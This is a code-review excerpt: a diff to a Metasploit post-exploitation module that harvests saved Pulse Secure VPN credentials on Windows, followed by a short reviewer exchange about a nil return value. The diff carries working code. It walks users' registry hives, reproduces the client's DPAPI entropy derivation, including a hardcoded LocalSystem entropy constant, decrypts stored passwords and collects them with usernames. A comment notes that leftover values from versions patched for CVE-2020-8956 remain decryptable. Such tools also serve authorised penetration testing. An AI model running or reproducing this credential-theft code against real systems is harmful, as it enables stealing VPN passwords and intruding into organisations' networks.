modules/post/windows/gather/credentials/pulse_secure.rb

```diff
@@ -174,81 +179,85 @@ def get_entropy_from_ive_index(ive_index)
+          reg_path = "HKEY_USERS\\#{profile['SID']}\\Software\\Pulse Secure\\Pulse\\User Data\\ive:#{ive_index}"
+          vals = registry_enumvals(reg_path)
+
+          next unless vals
+
+          vals.each do |val|
+            data = registry_getvaldata(reg_path, val)
+            if is_system? and data.starts_with?("{\x00c\x00a\x00p\x00i\x00}\x00 \x001\x00,")
+                # this means data was encrypted by elevated user using LocalSystem scope and fixed
+                # pOptionalEntropy value, adjusting parameters
+                data = [Rex::Text.to_ascii(data[18..-3])].pack('H*')
+                entropy = ['7B4C6492B77164BF81AB80EF044F01CE'].pack('H*')
+            else
+              # convert IVE index to DPAPI pOptionalEntropy value like PSC does
+              entropy = get_entropy_from_ive_index(ive_index).encode('UTF-16LE').bytes.pack("c*")
+            end
+
+            if !data.starts_with?("\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB")
+              next
+            end
+
+            decrypted = decrypt_reg(data, entropy)
+            next unless decrypted != ''
+
+            if !ives.key?(ive_index)
+              # If the ive_index is not in gathered IVEs, this means it's a leftover from
+              # previously installed Pulse Secure Connect client versions.
+              #
+              # IVE keys of existing connections can get removed from connstore.dat and connstore.tmp
+              # when the new version is executed and that the client has more than one defined connection,
+              # leading to them not being inserted in the 'ives' array.
+              #
+              # However, the registry values are not wiped when Pulse Secure Connect is upgraded
+              # to a new version (including versions that fix CVE-2020-8956).
+              #
+              # TL;DR; We can still decrypt the password, but we're missing the URI and friendly
+              # name of that connection.
+              ives[ive_index] = {}
+              ives[ive_index]['connection-source'] = 'user'
+              ives[ive_index]['friendly-name'] = 'unknown'
+              ives[ive_index]['uri'] = 'unknown'
+              ives[ive_index]['creds'] = []
+            end
+            ives[ive_index]['creds'].append(
+              {
+                'username' => get_username(profile['SID'], ive_index),
+                'password' => decrypted.remove("\x00")
+              }
+            )
+            creds << ives[ive_index]
           end
-          ives[ive_index]['creds'].append(
-            {
-              'username' => get_username(profile['SID'], ive_index),
-              'password' => decrypted.remove("\x00")
-            }
-          )
-          creds << ives[ive_index]
         end
       end
+      return creds
+    rescue Rex::Post::Meterpreter::RequestError => e
+      vprint_error(e.message)
     end
-    return creds
+    return nil
```

Comment:
This seems odd to me. Should this not be `[]`? Otherwise your going to be calling `nil.any?` which will fail and cause a stack trace.

Reply:
Damnit. Fixed